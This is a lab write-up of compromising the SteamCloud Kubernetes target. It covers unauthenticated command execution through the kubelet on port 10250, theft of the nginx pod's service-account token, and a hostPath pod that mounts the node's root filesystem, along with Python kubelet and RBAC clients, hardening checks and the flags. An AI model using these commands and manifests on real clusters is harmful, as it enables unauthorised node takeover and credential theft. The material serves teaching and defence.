This article walks through information gathering, vulnerability analysis and privilege escalation against a Kubernetes environment (the SteamCloud target, 10.10.11.133). The target is scanned for open ports and port 8443 is confirmed to be the Kubernetes API server; curl returns a 403, showing that anonymous users are authenticated but have no rights. The kubelet on port 10250, however, accepts unauthenticated requests: kubeletctl lists the pods, one of which is nginx, and runs commands inside it. The nginx pod's service-account token is read out, validated against the API server, and found to allow pod creation, so a new pod is created that mounts the node's root filesystem, yielding both the user and the root flag. The article closes with the key steps and lessons of pentesting a Kubernetes environment.
Information Gathering
{
"target": "10.10.11.133",
"scan_time": "2026-01-01 09:48:20",
"total_open_ports": 8,
"ports": [
{
"port": 22,
"service": "ssh",
"banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"
},
{
"port": 53,
"service": "domain",
"banner": null
},
{
"port": 2379,
"service": "Unknown",
"banner": null
},
{
"port": 2380,
"service": "Unknown",
"banner": null
},
{
"port": 8443,
"service": "Unknown",
"banner": null
},
{
"port": 10249,
"service": "Unknown",
"banner": null
},
{
"port": 10250,
"service": "Unknown",
"banner": null
},
{
"port": 10256,
"service": "Unknown",
"banner": null
}
]
}
Vulnerability Analysis
➜ SteamCloud curl -k https://10.10.11.133:8443/
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {
},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {
},
"code": 403
}
Port 8443 together with the kind/apiVersion/Status fields confirms that the target is a Kubernetes API server. The 403 for system:anonymous means the server accepts anonymous requests but RBAC denies them, so this port is not the way in by itself. The other open ports are the rest of a single-node control plane at their default numbers: 2379/2380 etcd, 10249 and 10256 kube-proxy, and 10250 the kubelet API. The kubelet is the one to test next, because it has its own authentication and authorization settings independent of the API server's RBAC.
Exploitation (User Flag)
List the pods through the kubelet on port 10250 (no credentials needed if anonymous kubelet access is enabled):
➜ SteamCloud kubeletctl --server 10.10.11.133 pods
┌────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 2 │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 3 │ storage-provisioner │ kube-system │ storage-provisioner │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 4 │ coredns-78fcd69978-glckl │ kube-system │ coredns │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 5 │ nginx │ default │ nginx │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 6 │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 7 │ etcd-steamcloud │ kube-system │ etcd │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 8 │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │
│ │ │ │ │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 scan rce
┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Node with pods vulnerable to RCE │
├───┬──────────────┬────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤
│ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ │ │ │ │ │ RUN │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 1 │ 10.10.11.133 │ coredns-78fcd69978-glckl │ kube-system │ coredns │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 2 │ │ nginx │ default │ nginx │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 3 │ │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 4 │ │ etcd-steamcloud │ kube-system │ etcd │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 5 │ │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 6 │ │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 7 │ │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 8 │ │ storage-provisioner │ kube-system │ storage-provisioner │ - │
└───┴──────────────┴────────────────────────────────────┴─────────────┴─────────────────────────┴─────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root) # root inside the container, not yet on the node
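What kubeletctl is doing against port 10250, as an added example that is not from the writeup or from kubeletctl itself: a minimal client for the two kubelet endpoints involved, GET /pods (the rows of the `pods` table) and POST /run/{namespace}/{pod}/{container}?cmd=... (what the `run` subcommand uses; `exec` goes through the streaming /exec endpoint instead). The kubelet address is the target from the scan; the /pods response below is a constructed sample so the parsing part runs offline.

```python
import json
import ssl
import urllib.parse
import urllib.request

KUBELET = "https://10.10.11.133:10250"  # kubelet read/write API seen in the port scan

# The kubelet serves a self-signed certificate; skip verification as kubeletctl does.
_CTX = ssl.create_default_context()
_CTX.check_hostname = False
_CTX.verify_mode = ssl.CERT_NONE


def containers_from_podlist(podlist: dict) -> list:
    """Flatten a kubelet GET /pods PodList into (namespace, pod, container) tuples,
    i.e. the rows of the kubeletctl `pods` table."""
    rows = []
    for pod in podlist.get("items", []):
        meta = pod["metadata"]
        for c in pod["spec"].get("containers", []):
            rows.append((meta["namespace"], meta["name"], c["name"]))
    return rows


def run_url(namespace: str, pod: str, container: str, cmd: str) -> str:
    """URL for POST /run/{ns}/{pod}/{container}?cmd=...; the kubelet splits cmd on spaces.
    cmd is put in the query string so it is found whether the server reads the URL
    query or the merged form values."""
    q = urllib.parse.quote
    return (f"{KUBELET}/run/{q(namespace)}/{q(pod)}/{q(container)}"
            f"?{urllib.parse.urlencode({'cmd': cmd})}")


def list_pods() -> list:
    """GET /pods on the live kubelet (network; not exercised by the offline sample)."""
    with urllib.request.urlopen(f"{KUBELET}/pods", context=_CTX, timeout=10) as r:
        return containers_from_podlist(json.load(r))


def run_cmd(namespace: str, pod: str, container: str, cmd: str) -> str:
    """Run cmd inside a container through the kubelet and return its output (network).
    An HTTPError 401/403 here means anonymous kubelet access is off and the hole is closed."""
    req = urllib.request.Request(run_url(namespace, pod, container, cmd),
                                 data=b"", method="POST")
    with urllib.request.urlopen(req, context=_CTX, timeout=30) as r:
        return r.read().decode(errors="replace")


# Constructed stand-in for a /pods response (two of the pods listed above); used offline.
SAMPLE_PODLIST = {
    "kind": "PodList",
    "items": [
        {"metadata": {"name": "nginx", "namespace": "default"},
         "spec": {"containers": [{"name": "nginx"}]}},
        {"metadata": {"name": "coredns-78fcd69978-glckl", "namespace": "kube-system"},
         "spec": {"containers": [{"name": "coredns"}]}},
    ],
}

if __name__ == "__main__":
    for ns, pod, c in list_pods():
        print(ns, pod, c)
    print(run_cmd("default", "nginx", "nginx", "id"))
```

The `+` column of `scan rce` is exactly this: a /run call that returns output instead of an error (the `-` rows are containers such as distroless images with no shell to run the command in). A hardened node runs the kubelet with `--anonymous-auth=false` and `--authorization-mode=Webhook`, after which every one of these requests is answered with 401 or 403.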
Privilege Escalation (Root Flag)
Read the service-account token and CA certificate mounted in the nginx pod and use them to authenticate to the main API server on 8443:
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.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.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg%
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
➜ SteamCloud export token="eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.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.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg"
➜ SteamCloud nano ca.crt
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          33m
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
pods                                            []                                     []               [get create list]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
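What `kubectl auth can-i --list` asks the API server, as an added example (not the writeup's own tooling and not kubectl's code): decode the stolen service-account JWT without verifying it, purely to see which account it belongs to, then POST a SelfSubjectRulesReview and evaluate verb/resource pairs against the rules it returns. The JWT payload on this page is elided, so the sample token's claims are constructed and assumed; the sample status mirrors the table above. The negative results matter as much as the positive one: the token can create pods but has no pods/exec right, so commands in any pod it creates still have to go through the unauthenticated kubelet.

```python
import base64
import json
import ssl
import urllib.request

APISERVER = "https://10.10.11.133:8443"  # API server from the scan above


def jwt_claims(token: str) -> dict:
    """Return the unverified payload of a JWT (base64url, padding restored).
    No signature check: we only want to read sub/namespace, not trust the token."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def rules_allow(status: dict, verb: str, resource: str, group: str = "") -> bool:
    """Evaluate SelfSubjectRulesReview.status.resourceRules for verb on resource.
    A rule matches when apiGroups, resources and verbs each list the value or '*'."""
    for rule in status.get("resourceRules", []):
        groups, resources, verbs = (rule.get(k, []) for k in ("apiGroups", "resources", "verbs"))
        if group not in groups and "*" not in groups:
            continue
        if resource not in resources and "*" not in resources:
            continue
        if verb in verbs or "*" in verbs:
            return True
    return False


def self_subject_rules_review(token: str, ca_path: str, namespace: str) -> dict:
    """POST a SelfSubjectRulesReview as the token's subject and return its status (network).
    ca_path is the ca.crt read out of the pod, exactly as kubectl was given it above."""
    body = json.dumps({
        "apiVersion": "authorization.k8s.io/v1",
        "kind": "SelfSubjectRulesReview",
        "spec": {"namespace": namespace},
    }).encode()
    req = urllib.request.Request(
        f"{APISERVER}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews",
        data=body, method="POST",
        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
    )
    ctx = ssl.create_default_context(cafile=ca_path)
    with urllib.request.urlopen(req, context=ctx, timeout=10) as r:
        return json.load(r)["status"]


def _b64url(obj) -> str:
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")


# Constructed token: the page's real payload is elided, so these claims are an assumption.
SAMPLE_TOKEN = ".".join([
    _b64url({"alg": "RS256", "kid": "constructed"}),
    _b64url({"iss": "kubernetes/serviceaccount",
             "kubernetes.io/serviceaccount/namespace": "default",
             "kubernetes.io/serviceaccount/service-account.name": "default",
             "sub": "system:serviceaccount:default:default"}),
    "c2ln",  # fake signature; jwt_claims never checks it
])

# Constructed status mirroring the `auth can-i --list` output above.
SAMPLE_STATUS = {
    "resourceRules": [
        {"verbs": ["create"], "apiGroups": ["authorization.k8s.io"],
         "resources": ["selfsubjectaccessreviews", "selfsubjectrulesreviews"]},
        {"verbs": ["get", "create", "list"], "apiGroups": [""], "resources": ["pods"]},
    ],
    "nonResourceRules": [
        {"verbs": ["get"], "nonResourceURLs": ["/api", "/api/*", "/apis", "/apis/*",
                                                "/healthz", "/livez", "/readyz",
                                                "/openapi", "/openapi/*", "/version", "/version/"]},
    ],
}

if __name__ == "__main__":
    claims = jwt_claims(SAMPLE_TOKEN)
    print("token subject:", claims["sub"])
    for verb, res in [("create", "pods"), ("create", "pods/exec"), ("delete", "pods")]:
        print(verb, res, rules_allow(SAMPLE_STATUS, verb, res))
```

Against the live cluster, `self_subject_rules_review(token, "ca.crt", claims["kubernetes.io/serviceaccount/namespace"])` returns the same structure as SAMPLE_STATUS. Any service account that can `create pods` in a namespace where hostPath volumes are permitted is effectively root on every node the scheduler will place its pod on, whatever else RBAC withholds from it.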
The token can create pods, so write f.yaml: a pod that mounts the node's / at /mnt/root through a hostPath volume. (hostNetwork: true is not needed for the mount; the hostPath volume alone gives read/write access to the node's filesystem.) Reading files out of the new pod afterwards still goes through kubeletctl, since the token has no pods/exec right.
apiVersion: v1
kind: Pod
metadata:
  name: nginxt
  namespace: default
spec:
  containers:
  - name: nginxt
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /mnt/root
      name: mount-root-into-mnt
  volumes:
  - name: mount-root-into-mnt
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f f.yaml
pod/nginxt created
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME     READY   STATUS    RESTARTS   AGE
nginx    1/1     Running   0          38m
nginxt   1/1     Running   0          54s
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/home/user/user.txt" -p nginxt -c nginxt
020d0e8176d3c7931b402d69b1320930
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/root/root.txt" -p nginxt -c nginxt
ce7eb1df436430aab7af0b7aa92e02ec
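Why the API server accepted f.yaml at all, and what would have stopped it, as an added example that is not part of the writeup: a small check implementing a subset of the Pod Security "baseline" profile (host namespaces, hostPath volumes, host ports, privileged containers) run over the escape pod above, expressed as a Python dict rather than YAML so it needs no extra library. A namespace carrying the label pod-security.kubernetes.io/enforce=baseline makes the built-in admission controller reject exactly these fields; the real profile also checks capabilities, sysctls, seccomp and AppArmor settings, which are left out here.

```python
import copy


def baseline_violations(pod: dict) -> list:
    """Return the baseline-profile violations in a Pod manifest (subset of the real checks)."""
    spec = pod.get("spec", {})
    found = []
    for field in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(field):
            found.append(f"spec.{field}=true")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            found.append(f"hostPath volume {vol['name']!r} -> {vol['hostPath'].get('path')}")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            found.append(f"container {c['name']!r} is privileged")
        for port in c.get("ports", []):
            if port.get("hostPort"):
                found.append(f"container {c['name']!r} uses hostPort {port['hostPort']}")
    return found


def strip_host_access(pod: dict) -> dict:
    """Copy of pod with the fields baseline rejects removed: what the attacker could
    still create in an enforced namespace (a container with no view of the node)."""
    p = copy.deepcopy(pod)
    for field in ("hostNetwork", "hostPID", "hostIPC"):
        p["spec"].pop(field, None)
    kept = [v for v in p["spec"].get("volumes", []) if "hostPath" not in v]
    p["spec"]["volumes"] = kept
    names = {v["name"] for v in kept}
    for c in p["spec"].get("containers", []):
        c["volumeMounts"] = [m for m in c.get("volumeMounts", []) if m["name"] in names]
        c.get("securityContext", {}).pop("privileged", None)
        c["ports"] = [pt for pt in c.get("ports", []) if not pt.get("hostPort")]
    return p


# f.yaml from above, as a dict.
ESCAPE_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "nginxt", "namespace": "default"},
    "spec": {
        "containers": [{
            "name": "nginxt",
            "image": "nginx:1.14.2",
            "volumeMounts": [{"mountPath": "/mnt/root", "name": "mount-root-into-mnt"}],
        }],
        "volumes": [{"name": "mount-root-into-mnt", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}

if __name__ == "__main__":
    for v in baseline_violations(ESCAPE_POD):
        print("baseline would reject:", v)
    print("after stripping:", baseline_violations(strip_host_access(ESCAPE_POD)))
```

Admission control closes the second half of the chain; the first half, anonymous command execution through the kubelet, is closed on the node itself with `--anonymous-auth=false` and `--authorization-mode=Webhook` (or the equivalent `authentication.anonymous.enabled: false` and `authorization.mode: Webhook` in the KubeletConfiguration file), so that the kubelet asks the API server whether a caller may use /pods and /run instead of answering everyone.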